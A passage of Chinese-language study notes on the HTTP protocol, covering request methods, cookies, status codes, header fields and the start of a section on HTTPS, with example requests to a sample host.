 112 | **请求报文** 是由请求方法, 请求URI, 协议版本, 可选的请求首部字段和内容实体构成的
 113 | 
 114 | ![[Pasted image 20220920084700.png]]
 115 | 
 116 | 响应报文基本由协议版本, 状态码和原因短语, 以及可选的响应首部字段和实体主体构成
 117 | 
 118 | ![[Pasted image 20220920085005.png]]
 119 | 
 120 | ### 2.2 HTTP 是不保存状态的协议
 121 | 
 122 | HTTP 是一种不保存状态的无状态协议, HTTP 协议自身不对请求和响应之间的通信状态进行保存.
 123 | 
 124 | - 客户端: 你之前给我发送了啥来着?
 125 | - 服务端: 我想想, 之前给你发送了啥来着?
 126 | 
 127 | ### 2.3 HTTP 请求方法
 128 | 
 129 | **2.3.1 GET**
 130 | 
 131 | GET 方法用来请求访问已被 URI 识别的资源。指定的资源经过服务器端解析后返回响应内容。也就是说如果请求的资源是文本，那就保存原样返回，如果是CGI【通用网关接口】那样的程序，则返回经过执行后的输出结果。
 132 | 
 133 | ```http
 134 | # 请求
 135 | GET/index.html HTTP/1.1
 136 | Host:www.hackr.jp
 137 | If-Modified-Since:Thu,12 Jul 2012 07:30:00 GMT
 138 | 
 139 | # 响应
 140 | 仅返回2012年7月12日7点30分以后更新过的ndex.html页面资源.如果未 有内容更新,则以状态码304 Not Modified作
 141 | ```
 142 | 
 143 | **2.3.2 POST**
 144 | 
 145 | POST 方法用来传输实体的主体
 146 | 
 147 | 虽然 GET 也可以传输实体的主体, 但是一般不用, POST 的主要目的并不是获取相应的主题内容
 148 | 
 149 | ```http
 150 | # 请求
 151 | POST /submit.cgi HTTP/1.1
 152 | Host:www.hackr.jp
 153 | Content-Length:1560 (1560字节的数据)
 154 | 
 155 | # 响应
 156 | 返回submit.cgi接收数据的处理结果
 157 | ```
 158 | 
 159 | **2.3.3 PUT**
 160 | 
 161 | PUT 方法的主要作用是上传文件, 要求在请求报文的主题中包含文件的内容, 然后保存到 URI 指定的位置
 162 | 
 163 | 但是 HTTP/1.1 自身不带验证机制, 任何人都可以上传文件, 所以应该禁用 PUT 方法
 164 | 
 165 | ```http
 166 | # 请求
 167 | PUT /example.html HTTP/1.1
 168 | Host:www.hackr.jp
 169 | Content-Type:text/html
 170 | Content-Length:1560 (1560字节的数据)
 171 | 
 172 | # 响应
 173 | 响应返回状态码204 No Content (比如:该html已存在于服务器)
 174 | ```
 175 | 
 176 | **2.3.4 HEAD**
 177 | 
 178 | 获取报文首部
 179 | 
 180 | HEAD 方法和 GET 方法一样, 知识不返回报文主体部分, 用于确认 URI 的有效性及资源更新的日期时间等
 181 | 
 182 | - 客户端: 把那个的相关信息告诉我
 183 | 
 184 | ```http
 185 | # 请求
 186 | HEAD /index.html HTTP/1.1
 187 | Host:www.hackr.jp
 188 | 
 189 | # 响应
 190 | 返回index.html有关的响应首部
 191 | ```
 192 | 
 193 | **2.3.5 DELETE**
 194 | 
 195 | DELETE 方法是用来删除文件的, 与之相反的是 PUT 方法, DELETE 方法按请求 URI 删除指定的资源, 同样的并没有验证机制, 也应该禁用
 196 | 
 197 | ```http
 198 | # 请求
 199 | DELETE /example.html HTTP/1.1
 200 | Host:www.hackr.jp
 201 | 
 202 | # 响应
 203 | 响应返回状态码204 No Content(比如:该html已从该服务器上乳除2
 204 | ```
 205 | 
 206 | **2.3.6 OPTIONS**
 207 | 
 208 | OPTIONS 方法用来查询针对请求 URI 指定的资源支持方法
 209 | 
 210 | ```http
 211 | # 请求
 212 | OPTIONS * HTTP/1.1
 213 | Host: www.hackr.jp
 214 | 
 215 | # 响应
 216 | HTTP/1.1 200 OK
 217 | Allow: GET.POST,HEAD,OPTIONS (返回服务器支持的方法)
 218 | ```
 219 | 
 220 | **2.3.7 TRACE**
 221 | 
 222 | TRACE 方法是让 Web 服务器将之前的请求通信环回给客户端的方法
 223 | 
 224 | 客户端通过 TRACE 方法可以查询发送出去的代理是怎样被加工修改的, 这是因为请求想要连接到源目标服务器可能会通过代理中专, TRACE 方法就是用来确认链接过程中发生的一系列操作
 225 | 
 226 | ![[Pasted image 20220920090110.png]]
 227 | 
 228 | ```http
 229 | # 请求
 230 | TRACE / HTTP/1.1
 231 | Host: hackr.jp
 232 | Max-Forwards: 2
 233 | 
 234 | # 响应
 235 | HTTP/1.1 200 OK
 236 | Content-Type: message/http
 237 | Content-Length: 1024
 238 | 
 239 | TRACE / HTTP/1.1
 240 | Host: hackr.jp
 241 | Max-Forwards: 2(返回响应包含请求内容)
 242 | ```
 243 | **2.3.8 CONNECT**
 244 | 
 245 | CONNECT要求用隧道协议链接代理
 246 | 
 247 | CONNECT 方法要求在与代理服务器通信时建立隧道, 实现用隧道协议进行 TCP 通信. 主要使用 SSL 和 TLS 协议把通信内容加密后经网络隧道传输.
 248 | 
 249 | CONNECT 方法格式: `CONNECT 代理服务器名:端口号 HTTP 版本`
 250 | 
 251 | ```http
 252 | # 请求
 253 | CONNECT proxy.hackr.jp:8080 HTTP/1.1
 254 | Host: proxy.hackr.jp
 255 | 
 256 | # 响应
 257 | HTTP/1.1 200 OK (之后进入网络隧道)
 258 | ```
 259 | 
 260 | ### 2.4 Cookie 的状态管理
 261 | 
 262 | 之前提到过 HTTP 是无状态协议, 它不对之前发生过的请求和响应状态进行管理, 无法根据之前的状态去处理这次的请求
 263 | 
 264 | 为了解决这个问题, 引入了 Cookie 技术, Cookie 技术通过在请求和响应报文中写入 Cookie 信息来控制客户端的状态
 265 | 
 266 | Cookie 会根据服务端发送的响应报文中的一个叫 Set-Cookie 的首部字段, 通知客户端保存 Cookie, 当下次客户端再往服务器发送请求时, 客户端会自动在请求报文中加入 Cookie 值之后发出
 267 | 
 268 | - 第一次没有 Cookie 信息状态下请求
 269 | 	1. 客户端发送请求
 270 | 	2. 服务端在响应中添加 Cookie 后返回
 271 | - 第二次存有 Cookie 状态的请求
 272 | 	1. 客户端在请求中添加 Cookie 后发送
 273 | 	2. 服务端: 阿是刚才那个家伙; 发送响应
 274 | 
 275 | ```http
 276 | # 请求报文 (没有Cookie信息)
 277 | GET /reader/HTTP/1.1
 278 | Host:hackr.jp
 279 | *首部字段内没有Cookie的相关信息
 280 | 
 281 | # 响应报文 (服务端生成Cookie信息)
 282 | HTTP/1.12000K
 283 | Date: Thu,12 Jul 2012 07:12:20 GMT
 284 | Server: Apache
 285 | <Set-Cookie: sid=1342077140226724;path=/;expires=Wed, 10-0ct-12 07:12:2 0GMT>
 286 | Content-Type:text/plain;charset=UTF-8
 287 | 
 288 | # 请求保存 (有Cookie信息)
 289 | GET /image/ HTTP/1.1
 290 | Host: hackr.jp
 291 | Cookie: sid=1342077140226724
 292 | ```
 293 | 
 294 | ## 第三章 HTTP 报文信息
 295 | 
 296 | ### 3.1 HTTP 报文
 297 | 
 298 | 用于 HTTP 协议交互的信息被称为 HTTP 报文. 客户端的 HTTP 报文叫做请求报文, 服务端的叫做响应报文
 299 | 
 300 | HTTP 报文大致可以分为**报文首部**和**报文主体**两块, 两者由最初出现的空行 (CR+LF) 来划分. 通常, 并不一定要有报文主体
 301 | 
 302 | - 报文首部: 服务端或客户端需处理的请求或响应内容及属性
 303 | - CR+LF: 
 304 | 	- CR (Carriage Return, 回车符: 16 进制 0x0d )
 305 | 	- LF (Line Frrd, 换行符: 16 进制 0x0a)
 306 | - 报文主体: 应被发送的数据
 307 | 
 308 | ### 3.2 请求报文和响应报文
 309 | 
 310 | **3.2.1 请求报文**
 311 | 
 312 | ![[Pasted image 20220920092107.png]]
 313 | 
 314 | - 请求行: 包含请求的方法, 请求 URI 和 HTTP 版本
 315 | - [x] 首部字段: 包含请求和响应的各种条件和属性的各类首部 (一般有四种首部, 分别是: 通用首部, 请求首部, 响应首部和实体首部)
 316 | 
 317 | **3.2.2 响应报文**
 318 | 
 319 | ![[Pasted image 20220920092113.png]]
 320 | 
 321 | - 状态行: 包含响应结果和状态码, 原因短语和 HTTP 版本
 322 | 
 323 | ## 第四章 HTTP 状态码
 324 | 
 325 | HTTP 状态码负责表示客户端 HTTP 请求的返回结果, 标记服务端的处理是否正常, 通信出现的错误等工作
 326 | 
 327 | ### 4.1 状态码告知服务器返回的请求结果
 328 | 
 329 | 状态码的职责是当客户端向服务器端发送请求时，描述返回的请求结果。借助状态码，用户可以知道服务器端是正常处理了请求，还是出现了错误。
 330 | 
 331 | **状态码的类别**
 332 | 
 333 | - 1XX : Informational(信息性状态码) : 接收的请求正在处理
 334 | - 2XX : Success(成功状态码) : 请求正常处理完毕
 335 | - 3XX : Redirection(重定向状态码) : 需要进行附加操作以完成请求
 336 | - 4XX : Client Error(客户端错误状态码) : 服务器无法处理请求
 337 | - 5XX : Server Error(服务器错误状态码) : 服务器处理请求出错
 338 | 
 339 | ### 4.2 2XX 成功
 340 | 
 341 | 2XX 的响应结果表明请求被正常处理了
 342 | 
 343 | **4.2.1 200 OK**
 344 | 
 345 | 在响应报文内，随状态码一起返回的信息会因方法的不同而发生改变。比如，使用 GET 方法时，对应请求资源的实体会作为响应返回；而使用 HEAD 方法时，对应请求资源的实体首部不随报文主体作为响应返回（即在响应中只返回首部，不会返回实体的主体部分）。
 346 | 
 347 | **4.2.2 204 Not Content**
 348 | 
 349 | 该状态码代表服务器接收的请求已成功处理，但在返回的响应报文中不含实体的主体部分。另外，也不允许返回任何实体的主体。比如，当从浏览器发出请求处理后，返回 204 响应，那么浏览器显示的页面不发生更新。
 350 | 
 351 | **4.2.3 206 Partial Content**
 352 | 
 353 | 该状态码表示客户端进行了范围请求 (只请求一部分)，而服务器成功执行了这部分的GET 请求。响应报文中包含由 Content-Range 指定范围的实体内容。
 354 | 
 355 | ### 4.3 3XX 重定向
 356 | 
 357 | 3XX 响应结果表明浏览器需要执行某些特殊的处理以正确处理请求。
 358 | 
 359 | **4.3.1  301 Moved Permanently 永久性重定向**
 360 | 
 361 | 请求的资源已被分配了新的 URI，以后应使用资源现在所指的 URI。也就是说，如果已经把资源对应的 URI 保存为书签了，这时应该按 Location 首部字段提示的 URI 重新保存。
 362 | 
 363 | **4.3.2 302 Found 临时重定向**
 364 | 
 365 | 请求的资源已被分配了新的 URI，希望用户（本次）能使用新的 URI 访问。和 301 Moved Permanently 状态码相似，但 302 状态码代表的资源不是被永久移动，只是临时性质的。换句话说，已移动的资源对应的URI 将来还有可能发生改变。比如，用户把 URI 保存成书签，但不会像 301 状态码出现时那样去更新书签，而是仍旧保留返回 302 状态码的页面对应的 URI。 
 366 | 
 367 | **4.3.3  303 See Other**
 368 | 
 369 | 请求对应的资源存在着另一个 URI，应使用 GET方法定向获取请求的资源。
 370 | 
 371 | 303 状态码和 302 Found 状态码有着相同的功能，但 303 状态码明确表示客户端应当采用 GET 方法获取资源，这点与 302 状态码有区别。 
 372 | 
 373 | **4.3.4 304 Not Modified**
 374 | 
 375 | 客户端发送附带条件的请求时，服务器端允许请求访问资源，但未满足条件的情况。304 状态码返回时，不包含任何响应的主体部分。304 虽然被划分在 3XX 类别中，但是和重定向没有关系。
 376 | 
 377 | ### 4.4 4XX 客户端错误
 378 | 
 379 | 4XX 的响应结果表明客户端是发生错误的原因所在。
 380 | 
 381 | **4.4.1 400 Bad Request**
 382 | 
 383 | 请求报文中存在语法错误。当错误发生时，需修改请求的内容后再次发送请求。另外，浏览器会像 200 OK 一样对待该状态码。
 384 | 
 385 | **4.4.2 401 Unauthorized**
 386 | 
 387 | 该发送的请求需要有通过 HTTP 认证（BASIC 认证、DIGEST 认证）的认证信息。另外若之前已进行过 1 次请求，则表示用 户认证失败。
 388 | 
 389 | **4.4.3 403 Forbidden**
 390 | 
 391 | 对请求资源的访问被服务器拒绝了。服务器端没有必要给出拒绝的详细理由，但如果想作说明的话，可以在实体的主体部分对原因进行描述，这样就能让用户看到了。
 392 | 
 393 | **4.4.4 404 Not Found**
 394 | 
 395 | 该状态码表明服务器上无法找到请求的资源。除此之外，也可以在服务器端拒绝请求且不想说明理由时使用。
 396 | 
 397 | ### 4.5 5XX 服务器错误
 398 | 
 399 | 5XX 的响应结果表明服务器本身发生错误。
 400 | 
 401 | **4.5.1 500 Internal Server Error**
 402 | 
 403 | 该状态码表明服务器端在执行请求时发生了错误。也有可能是 Web应用存在的 bug 或某些临时的故障。
 404 | 
 405 | **4.5.2 503 Service Unavailable**
 406 | 
 407 | 该状态码表明服务器暂时处于超负载或正在进行停机维护，现在无法处理请求。如果事先得知解除以上状况需要的时间，最好写入RetryAfter 首部字段再返回给客户端。 
 408 | 
 409 | ## 第五章 HTTP 首部
 410 | 
 411 | ### 5.1 HTTP 报文首部
 412 | 
 413 | HTTP 协议的请求和响应报文中必定包含 HTTP 首部，首部内容为客户端和服务器分别处理请求和响应提供所需要的信息。
 414 | 
 415 | **HTTP 请求报文**
 416 | 
 417 | 在请求中，HTTP 报文由方法、URI、HTTP 版本、HTTP 首部字段等部分构成。
 418 | 
 419 | - 报文首部: 
 420 | 	- 请求行 (方法, URI, HTTP 版本)
 421 | 	- 请求首部字段, 通用首部字段, 实体首部字段 (HTTP 首部字段)
 422 | 	- 其他
 423 | - 空行 ( CR+LF)
 424 | - 报文主体
 425 | 
 426 | 下面是访问 hacker.jp 时, 请求报文的首部信息
 427 | 
 428 | ```http
 429 | GET / HTTP/1.1
 430 | Host: hackr.jp
 431 | User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64;rv:13.0)Ged
 432 | Accept: text/html,application/xhtml+xml,application/xml;q=0
 433 | Accept-Language: ja,en-us;q=0.7,en;q=0.3
 434 | Accept-Encoding: gzip,deflate
 435 | DNT: 1
 436 | Connection: keep-alive
 437 | If-Modified-Since: Fri,31 Aug 2007 02:02:20 GMT
 438 | If-None-Match: "45bae1-16a-46d776ac"
 439 | Cache-Control: max-age=0
 440 | ```
 441 | 
 442 | **HTTP 响应报文**
 443 | 
 444 | 在响应中，HTTP 报文由 HTTP 版本、状态码（数字和原因短语）、HTTP 首部字段 3 部分构成。 
 445 | 
 446 | - 报文首部: 
 447 | 	- 状态行 (HTTP 版本, 状态码)
 448 | 	- 响应首部字段, 通用首部字段, 实体首部字段 (HTTP 首部字段)
 449 | 	- 其他
 450 | - 空行 ( CR+LF)
 451 | - 报文主体
 452 | 
 453 | 下面是访问 hack.jp/ 时, 返回的响应报文的首部信息
 454 | 
 455 | ```http
 456 | HTTP/1.1 304 Not Modified
 457 | Date: Thu,07 Jun 2012 07:21:36 GMT
 458 | Server: Apache
 459 | Connection: close
 460 | Etag: "45bae1-16a-46d776ac"
 461 | ```
 462 | 在报文众多的字段当中，HTTP 首部字段包含的信息最为丰富。首部字段同时存在于请求和响应报文内，并涵盖 HTTP 报文相关的内容信息。
 463 | 
 464 | ### 5.2 HTTP 首部字段
 465 | 
 466 | **5.2.1 HTTP首部字段传递重要信息**
 467 | 
 468 | HTTP 首部字段是构成 HTTP 报文的要素之一。在客户端与服务器之间以 HTTP 协议进行通信的过程中，无论是请求还是响应都会使用首部字段，它能起到传递额外重要信息的作用。使用首部字段是为了给浏览器和服务器提供报文主体大小、所使用的语言、认证信息等内容。
 469 | 
 470 | **5.2.2 HTTP 首部字段结构**
 471 | 
 472 | HTTP 首部字段是由**首部字段名**和**字段值构成的**, 中间用冒号 ":" 分隔.
 473 | 
 474 | ```text
 475 | 首部字段名: 字段值
 476 | ```
 477 | 例如在 HTTP 首部中以 Content-Type 这个字段来表示报文主体的对象类型
 478 | 
 479 | ```http
 480 | Content-Type: text/html
 481 | ```
 482 | 
 483 | 就上述示例来看, 首部字段名为 `Content-Type` 字符串 `text/html` 是字段值
 484 | 
 485 | **5.2.3 4种HTTP 首部字段类型**
 486 | 
 487 | HTTP 首部字段根据实际用途被分为以下 4 种类型。
 488 | 
 489 | -   通用首部字段（General Header Fields) : 请求报文和响应报文两方都会使用的首部。
 490 | -   请求首部字段（Request Header Fields）：从客户端向服务器端发送请求报文时使用的首部。补充了请求的附加内容、客户端信信息、响应内容相关优先级等信息。
 491 | -   响应首部字段（Response Header Fields）：从服务器端向客户端返回响应报文时使用的首部。补充了响应的附加内容，也会要求客户端附加额外的内容信息。 
 492 | -   实体首部字段（Entity Header Fields）：针对请求报文和响应报文的实体部分使用的首部。补充了资源内容更新时间等与实体有关的信息。 
 493 | 
 494 | **5.2.4 HTTP/1.1 首部字段**
 495 | 
 496 | **1. 通用首部字段**
 497 | 
 498 | - Cache-Control : 控制缓存的行为
 499 | - Connection : 逐跳首部、连接的管理
 500 | - Date : 创建报文的日期时间
 501 | - Pragma : 报文指令
 502 | - Trailer : 报文末端的首部一览
 503 | - Transfer-Encoding : 指定报文主体的传输编码方式
 504 | - Upgrade : 升级为其他协议
 505 | - Via : 代理服务器的相关信息
 506 | - Warning : 错误通知
 507 | 
 508 | **2. 请求首部字段**
 509 | 
 510 | - Accept : 用户代理可处理的媒体类型
 511 | - Accept-Charset : 优先的字符集
 512 | - Accept-Encoding : 优先的内容编码
 513 | - Accept-Language : 优先的语言（自然语言）
 514 | - Authorization : Web认证信息
 515 | - Expect : 期待服务器的特定行为
 516 | - From : 用户的电子邮箱地址
 517 | - Host : 请求资源所在服务器
 518 | - If-Match : 比较实体标记(ETag)
 519 | - If-Modified-Since : 比较资源的更新时间
 520 | - If-None-Match : 比较实体标记（与If-Match相反）
 521 | - If-Range : 资源未更新时发送实体Byte的范围请求
 522 | - If-Unmodified-Since : 比较资源的更新时间（与If-Modified-Since相反）
 523 | - Max-Forwards : 最大传输逐跳数
 524 | - Proxy-Authorization : 代理服务器要求客户端的认证信息
 525 | - Range : 实体的字节范围请求
 526 | - Referer : 对请求中URI的原始获取方
 527 | - TE : 传输编码的优先级
 528 | - User-Agent : HTTP客户端程序的信息
 529 | 
 530 | **3. 响应首部字段**
 531 | 
 532 | - Accept-Ranges : 是否接受字节范围请求
 533 | - Age : 推算资源创建经过时间
 534 | - ETag : 资源的匹配信息
 535 | - Location : 令客户端重定向至指定URI
 536 | - Proxy-Authenticate : 代理服务器对客户端的认证信息
 537 | - Retry-After : 对再次发起请求的时机要求
 538 | - Server : HTTP服务器的安装信息
 539 | - Vary : 代理服务器缓存的管理信息
 540 | - WWW-Authenticate : 服务器对客户端的认证信息
 541 | 
 542 | **4. 实体首部字段**
 543 | 
 544 | - Allow : 资源可支持的HTTP方法
 545 | - Content-Encoding : 实体主体适用的编码方式
 546 | - Content-Language : 实体主体的自然语言
 547 | - Content-Length : 实体主体的大小（单位:字节）
 548 | - Content-Location : 替代对应资源的URI
 549 | - Content-MD5 : 实体主体的报文摘要
 550 | - Content-Range : 实体主体的位置范围
 551 | - Content-Type : 实体主体的媒体类型
 552 | - Expires : 实体主体过期的日期时间
 553 | - Last-Modified : 资源的最后修改日期时间
 554 | 
 555 | ### 5.3 HTTP/1.1 通用首部字段
 556 | 
 557 | 通用首部字段是指, 请求报文和响应报文双方都会使用的首部
 558 | 
 559 | **5.3.1 Cache-Control**
 560 | 
 561 | ![[Pasted image 20220920101039.png]]
 562 | 
 563 | **Cache-Control** 通用消息头字段，被用于在 http 请求和响应中，通过指定指令来实现缓存机制。缓存指令是单向的，这意味着在请求中设置的指令，不一定被包含在响应中。
 564 | 
 565 | 通用指定首部字段 Cache-Control 的指令, 就能操作缓存的工作机制
 566 | 
 567 | 指令的参数是可选的，多个指令之间通过“,”分隔。首部字段 Cache-Control 的指令可用于请求及响应时。  
 568 | 
 569 | ```http
 570 | Cache-Control: private, max-age=0, no-cache 
 571 | ```
 572 | 
 573 | **public 指令**
 574 | 
 575 | ```http
 576 | Cache-Control: Public
 577 | ```
 578 | 
 579 | 当指定使用 public 指令时, 则明确表明其他用户也可以利用缓存
 580 | 
 581 | **private 指令**
 582 | 
 583 | ```http
 584 | Cache-Control: private
 585 | ```
 586 | 
 587 | 当指定 private 指令后, 响应只以特定的用户作为对象, 这与 public 指定的行为相反, 缓存服务器会对该特定用户提供资源缓存的服务, 对于其他用户发送的请求, 代理服务器则不会返回缓存
 588 | 
 589 | **no-cache 指令**
 590 | 
 591 | ```http
 592 | Cache-Control: no-cache
 593 | ```
 594 | 
 595 | 使用 no-chache 指令的目的是防止从缓存中返回过期的资源, 客户端发送的请求中如果包含 no-cache 指令, 则表示客户单将不会接受缓存过的响应, 于是 "中间" 的缓存服务器必须把客户端请求转发给资源服务器
 596 | 
 597 | **no-store 指令**
 598 | 
 599 | ```http
 600 | Cache-Control: no-store
 601 | ```
 602 | 
 603 | 当使用 no-store 指令 1 时，暗示请求（和对应的响应）或响应中包含机密信息。
 604 | 
 605 | **指定缓存期限和认证的指令**
 606 | 
 607 | **s-maxage 指令**
 608 | 
 609 | ```http
 610 | Cache-Control: s-maxage=604800（单位 ：秒)
 611 | ```
 612 | 
 613 | s-maxage 指令的功能和 max-age 指令的相同，它们的不同点是 s-maxage 指令只适用于供多位用户使用的公共缓存服务器 2。也就是说，对于向同一用户重复返回响应的服务器来说，这个指令没有任何作用。
 614 | 
 615 | **max-age 指令**
 616 | 
 617 | ```http
 618 | Cache-Control: max-age=604800（单位：秒）
 619 | ```
 620 | 
 621 | 当客户端发送的请求中包含 max-age 指令时，如果判定缓存资源的缓存时间数值比指定时间的数值更小，那么客户端就接收缓存的资源。
 622 | 
 623 | 另外，当指定 max-age 值为 0，那么缓存服务器通常需要将请求转发给源服务器。当服务器返回的响应中包含 max-age 指令时，缓存服务器将不对资源的
 624 | 
 625 | **min-fresh 指令**
 626 | 
 627 | ```http
 628 | Cache-Control: min-fresh=60（单位：秒） 
 629 | ```
 630 | 
 631 | min-fresh 指令要求缓存服务器返回至少还未过指定时间的缓存资源。比如，当指定 min-fresh 为 60 秒后，过了 60 秒的资源都无法作为响应返回了。 
 632 | 
 633 | **only-if-cached 指令**
 634 | 
 635 | ```http
 636 | Cache-Control: only-if-cached
 637 | ```
 638 | 
 639 | 使用 only-if-cached 指令表示客户端仅在缓存服务器本地缓存目标资源的情况下才会要求其返回。换言之，该指令要求缓存服务器不重新加载响应，也不会再次确认资源有效性。若发生请求缓存服务器的本地缓存无响应，则返回状态码 504 Gateway Timeout。 
 640 | 
 641 | **5.3.2 Connection**
 642 | 
 643 | Connection 首部字段具备如下两个作用。
 644 | 
 645 | 1. 控制不再转发给代理的首部字段
 646 | 
 647 | ```http
 648 | # 原始请求
 649 | GET HTTP/1.1
 650 | Upgrade:HTTP/1.1
 651 | Connection:Upgrade
 652 | 
 653 | # 不转发首部字段
 654 | GET / HTTP/1.1
 655 | ```
 656 | 
 657 | 在客户端发送请求和服务器返回响应内，使用 Connection 首部字段，可控制不再转发给代理的首部字段（即 Hop-by-hop 首部）。 
 658 | 
 659 | 2. 管理持久连接
 660 | 
 661 | ```http
 662 | Connection: Keep-Alive
 663 | 
 664 | # 请求数据
 665 | GET / HTTP/1.1
 666 | Connection: Keep-Alive
 667 | 
 668 | # 响应数据
 669 | HTTP/1.1 200 OK
 670 | ...
 671 | Keep-Alive:timeout=10,max=500
 672 | Connection:Keep-Alive
 673 | ```
 674 | 
 675 | **5.3.3 Via**
 676 | 
 677 | 使用首部字段 Via 是为了追踪客户端与服务器之间的请求和响应报文的传输路径, 首部字段 Via 不仅用于追踪报文的转发, 还可以避免请求
 678 | 
 679 | 回环的发生。所以必须在经过代理时附加该首部字段内容。 
 680 | 
 681 | ![[Pasted image 20220920101755.png]]
 682 | 
 683 | ### 5.4 请求首部字段
 684 | 
 685 | 请求首部字段是从客户端往服务器端发送请求报文中所使用的字段，用于补充请求的附加信息、客户端信息、对响应内容相关的优先级等内容。
 686 | 
 687 | **5.4.1 Accept**
 688 | 
 689 | ![[Pasted image 20220920101857.png]]
 690 | 
 691 | Accept 首部字段可通知服务器，用户代理能够处理的媒体类型及媒体类型的相对优先级。可使用 type/subtype 这种形式，一次指定多种媒体类型。 
 692 | 
 693 | **5.4.2 Accept-Charset**
 694 | 
 695 | ![[Pasted image 20220920101933.png]]
 696 | 
 697 | Accept-Charset 首部字段可用来通知服务器用户代理支持的字符集及字符集的相对优先顺序。另外，可一次性指定多种字符集。与首部字段 Accept 相同的是可用权重 q 值来表示相对优先级。 
 698 | 
 699 | **5.4.3 Accept-Encoding**
 700 | 
 701 | ![[Pasted image 20220920101959.png]]
 702 | 
 703 | Accept-Encoding 首部字段用来告知服务器用户代理支持的内容编码及 内容编码的优先级顺序。可一次性指定多种内容编码。
 704 | 
 705 | ### 5.5 响应首部字段
 706 | 
 707 | 响应首部字段是由服务器端向客户端返回响应报文中所使用的字段，用于补充响应的附加信息、服务器信息，以及对客户端的附加要求等信息
 708 | 
 709 | **5.5.1 Accept-Ranges**
 710 | 
 711 | ```http
 712 | Accept-Ranges: bytes
 713 | ```
 714 | 
 715 | 首部字段 Accept-Ranges 是用来告知客户端服务器是否能处理范围请求，以指定获取服务器端某个部分的资源。 可指定的字段值有两种，可处理范围请求时指定其为 bytes，反之则指定其为 none。 
 716 | 
 717 | **5.5.2 Age**
 718 | 
 719 | ```http
 720 | Age: 600
 721 | ```
 722 | 
 723 | 首部字段 Age 能告知客户端，源服务器在多久前创建了响应。字段值的单位为秒。若创建该响应的服务器是缓存服务器，Age 值是指缓存后的响应再次发起认证到认证完成的时间值。代理创建响应时必须加上首部字段Age
 724 | 
 725 | **5.5.3 Location**
 726 | 
 727 | ![[Pasted image 20220920102155.png]]
 728 | 
 729 | 使用首部字段 Location 可以将响应接收方引导至某个与请求 URI 位置不同的资源。几乎所有的浏览器在接收到包含首部字段 Location 的响应后，都会强制性地尝试对已提示的重定向资源的访问。
 730 | 
 731 | ### 5.6 实体首部字段
 732 | 
 733 | 实体首部字段是包含在请求报文和响应报文中的实体部分所使用的首部，用于补充内容的更新时间等与实体相关的信息。
 734 | 
 735 | **5.6.1 Allow**
 736 | 
 737 | ```http
 738 | Allow: GET, HEAD
 739 | ```
 740 | 
 741 | 首部字段 Allow 用于通知客户端能够支持 Request-URI 指定资源的所有 HTTP 方法。当服务器接收到不支持的 HTTP 方法时，会以状态码405 Method Not Allowed 作为响应返回。与此同时，还会把所有能支持的 HTTP 方法写入首部字段 Allow 后返回。 
 742 | 
 743 | **5.6.2 Content-Type**
 744 | 
 745 | ```http
 746 | Content-Type: text/html; charset=UTF-8 
 747 | ```
 748 | 
 749 | 首部字段 Content-Type 说明了实体主体内对象的媒体类型。和首部字段 Accept 一样，字段值用 type/subtype 形式赋值。 
 750 | 
 751 | **5.6.3 Expires**
 752 | 
 753 | ```http
 754 | Expires: Wed, 04 Jul 2020 08:26:05 GMT
 755 | ```
 756 | 
 757 | 首部字段 Expires 会将资源失效的日期告知客户端。缓存服务器在接收到含有首部字段 Expires 的响应后，会以缓存来应答请求，在Expires 字段值指定的时间之前，响应的副本会一直被保存。当超过指定的时间后，缓存服务器在请求发送过来时，会转向源服务器请求资源。 
 758 | 
 759 | 源服务器不希望缓存服务器对资源缓存时，最好在 Expires 字段内写入与首部字段 Date 相同的时间值。
 760 | 
 761 | **5.6.4 Last-Modified**
 762 | 
 763 | ```http
 764 | Last-Modified: Wed, 23 May 2020 09:59:55 GMT
 765 | ```
 766 | 
 767 | 首部字段 Last-Modified 指明资源最终修改的时间。一般来说，这个值就是 Request-URI 指定资源被修改的时间。但类似使用 CGI 脚本进
 768 | 
 769 | 行动态数据处理时，该值有可能会变成数据最终修改时的时间。
 770 | 
 771 | ### 5.7 为 Cookie 服务的首部字段
 772 | 
 773 | **5.7.1 Set-Cookie**
 774 | 
 775 | ```http
 776 | Set-Cookie: status=enable; expires=Tue, 05 Jul 2020 07:26:31
 777 | ```
 778 | 
 779 | 当服务器准备开始管理客户端的状态时，会事先告知各种信息。 
 780 | 
 781 | Set-Cookie字段值
 782 | 
 783 | - NAME-VALUE : 赋予Cookie的名称和其值（必需项）
 784 | - expires=DATE : Cookie的有效期（若不明确指定则默认为浏览器关闭前为止）
 785 | - path=PATH : 将服务器上的文件目录作为Cookie的适用对象（若不指定则默 认为文档所在的文件目录)
 786 | - domain=域名 : 作为Cookie适用对象的域名（若不指定则默认为创建Cookie 的服务器的域名)
 787 | - Secure : 仅在HTTPS安全通信时才会发送Cookie
 788 | - HttpOnly : 加以限制，使Cookie不能被JavaScript脚本访问
 789 | 
 790 | **5.7.2 Cookie**
 791 | 
 792 | ```http
 793 | Cookie: status=enable
 794 | ```
 795 | 
 796 | 首部字段 Cookie 会告知服务器，当客户端想获得 HTTP 状态管理支持时，就会在请求中包含从服务器接收到的 Cookie。接收到多个Cookie 时，同样可以以多个 Cookie 形式发送。 
 797 | 
 798 | ## 第六章 HTTPS 确保Web安全
 799 | 
 800 | ### 6.1 HTTP 的缺点
 801 | 
 802 | - 无法证明报文的完整性, 内容可能被篡改
 803 | - 通信使用明文 (不加密), 内容可能被监听
 804 | - 不验证通信双方的身份, 可能遭遇伪装
 805 | 
 806 | ### 6.2 HTTP + 加密 + 认证 + 完整性保护 = HTTPS
 807 | 
 808 | 通常在登录页面或是购物页面使用 HTTPS 通信, 使用 HTTPS 通信时, 不再使用 http:// 协议 而是使用 https://
 809 | 
 810 | 当浏览器访问 HTTPS 通信有效的 Web 页面时, 浏览器的地址栏内会出现一个带锁的标记, 对 HTTPS 的显示方式会因为浏览器的不同而有所改变
 811 | 
 812 | **6.2.1 HTTPS是自身披SSL外壳的HTTP**
 813 | 
 814 | HTTPS 并非是应用层的一种新协议. 只是 HTTP **通信接口部分用SSL**（Secure Socket Layer）和 **TLS**（Transport Layer Security）协议代替而已。当使用 SSL时，则演变成先和 SSL通信，再由 SSL和 TCP 通信了。简言之，所谓 HTTPS，其实就是身披SSL协议这层外壳的 HTTP。 
 815 | 
 816 | 在采用 SSL 后, HTTP 就拥有了 HTTPS 的加密, 证书和完整性保护这些功能
 817 | 
